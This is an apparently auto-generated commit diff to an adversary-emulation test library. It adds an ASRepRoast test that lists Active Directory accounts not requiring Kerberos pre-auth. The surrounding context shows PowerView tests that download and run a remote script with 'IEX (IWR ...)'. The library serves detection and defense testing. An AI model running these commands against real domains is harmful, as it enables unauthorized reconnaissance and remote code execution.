Generate docs from job=validate_atomics_generate_docs branch=master

2020-06-25 20:36:36 +00:00
parent 90285a3fe1
commit ded0f5bc53
8 changed files with 47 additions and 0 deletions
@@ -426,6 +426,7 @@ discovery,T1069.002,Domain Groups,3,Elevated group enumeration using net group (
 discovery,T1069.002,Domain Groups,4,Find machines where user has local admin access (PowerView),a2d71eee-a353-4232-9f86-54f4288dd8c1,powershell
 discovery,T1069.002,Domain Groups,5,Find local admins on all machines in domain (PowerView),a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd,powershell
 discovery,T1069.002,Domain Groups,6,Find Local Admins via Group Policy (PowerView),64fdb43b-5259-467a-b000-1b02c00e510a,powershell
+discovery,T1069.002,Domain Groups,7,Enumerate Users Not Requiring Pre Auth (ASRepRoast),870ba71e-6858-4f6d-895c-bb6237f6121b,powershell
 discovery,T1482,Domain Trust Discovery,1,Windows - Discover domain trusts with dsquery,4700a710-c821-4e17-a3ec-9e4c81d6845f,command_prompt
 discovery,T1482,Domain Trust Discovery,2,Windows - Discover domain trusts with nltest,2e22641d-0498-48d2-b9ff-c71e496ccdbe,command_prompt
 discovery,T1482,Domain Trust Discovery,3,Powershell enumerate domains and forests,c58fbc62-8a62-489e-8f2d-3565d7d96f30,powershell
@@ -260,6 +260,7 @@ discovery,T1069.002,Domain Groups,3,Elevated group enumeration using net group (
 discovery,T1069.002,Domain Groups,4,Find machines where user has local admin access (PowerView),a2d71eee-a353-4232-9f86-54f4288dd8c1,powershell
 discovery,T1069.002,Domain Groups,5,Find local admins on all machines in domain (PowerView),a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd,powershell
 discovery,T1069.002,Domain Groups,6,Find Local Admins via Group Policy (PowerView),64fdb43b-5259-467a-b000-1b02c00e510a,powershell
+discovery,T1069.002,Domain Groups,7,Enumerate Users Not Requiring Pre Auth (ASRepRoast),870ba71e-6858-4f6d-895c-bb6237f6121b,powershell
 discovery,T1482,Domain Trust Discovery,1,Windows - Discover domain trusts with dsquery,4700a710-c821-4e17-a3ec-9e4c81d6845f,command_prompt
 discovery,T1482,Domain Trust Discovery,2,Windows - Discover domain trusts with nltest,2e22641d-0498-48d2-b9ff-c71e496ccdbe,command_prompt
 discovery,T1482,Domain Trust Discovery,3,Powershell enumerate domains and forests,c58fbc62-8a62-489e-8f2d-3565d7d96f30,powershell
@@ -826,6 +826,7 @@
  - Atomic Test #4: Find machines where user has local admin access (PowerView) [windows]
  - Atomic Test #5: Find local admins on all machines in domain (PowerView) [windows]
  - Atomic Test #6: Find Local Admins via Group Policy (PowerView) [windows]
+  - Atomic Test #7: Enumerate Users Not Requiring Pre Auth (ASRepRoast) [windows]
 - [T1482 Domain Trust Discovery](../../T1482/T1482.md)
  - Atomic Test #1: Windows - Discover domain trusts with dsquery [windows]
  - Atomic Test #2: Windows - Discover domain trusts with nltest [windows]
@@ -536,6 +536,7 @@
  - Atomic Test #4: Find machines where user has local admin access (PowerView) [windows]
  - Atomic Test #5: Find local admins on all machines in domain (PowerView) [windows]
  - Atomic Test #6: Find Local Admins via Group Policy (PowerView) [windows]
+  - Atomic Test #7: Enumerate Users Not Requiring Pre Auth (ASRepRoast) [windows]
 - [T1482 Domain Trust Discovery](../../T1482/T1482.md)
  - Atomic Test #1: Windows - Discover domain trusts with dsquery [windows]
  - Atomic Test #2: Windows - Discover domain trusts with nltest [windows]
@@ -35455,6 +35455,20 @@ discovery:
        command: 'IEX (IWR ''https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1'');
          Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose'
        name: powershell
+    - name: Enumerate Users Not Requiring Pre Auth (ASRepRoast)
+      auto_generated_guid: 870ba71e-6858-4f6d-895c-bb6237f6121b
+      description: |
+        When successful, accounts that do not require kerberos pre-auth will be returned
+        Requires the Active Directory module for powershell to be installed
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: 'get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth
+          -eq $TRUE}
+
+'
  T1482:
    technique:
      id: attack-pattern--767dbf9e-df3f-45cb-8998-4903ab5f80c0
@@ -18,6 +18,8 @@ Commands such as <code>net group /domain</code> of the [Net](https://attack.mitr

 - [Atomic Test #6 - Find Local Admins via Group Policy (PowerView)](#atomic-test-6---find-local-admins-via-group-policy-powerview)

+- [Atomic Test #7 - Enumerate Users Not Requiring Pre Auth (ASRepRoast)](#atomic-test-7---enumerate-users-not-requiring-pre-auth-asreproast)
+

 <br/>

@@ -180,4 +182,29 @@ IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d29



+<br/>
+<br/>
+
+## Atomic Test #7 - Enumerate Users Not Requiring Pre Auth (ASRepRoast)
+When successful, accounts that do not require kerberos pre-auth will be returned
+Requires the Active Directory module for powershell to be installed
+
+**Supported Platforms:** Windows
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq $TRUE}
+```
+
+
+
+
+
+
 <br/>
@@ -79,6 +79,7 @@ atomic_tests:
    command: "IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1'); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose"
    name: powershell
 - name: Enumerate Users Not Requiring Pre Auth (ASRepRoast)
+  auto_generated_guid: 870ba71e-6858-4f6d-895c-bb6237f6121b
  description: |
    When successful, accounts that do not require kerberos pre-auth will be returned
    Requires the Active Directory module for powershell to be installed
@@ -531,3 +531,4 @@ ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b
 161dcd85-d014-4f5e-900c-d3eaae82a0f7
 648d68c1-8bcd-4486-9abe-71c6655b6a2c
 784e4011-bd1a-4ecd-a63a-8feb278512e6
+870ba71e-6858-4f6d-895c-bb6237f6121b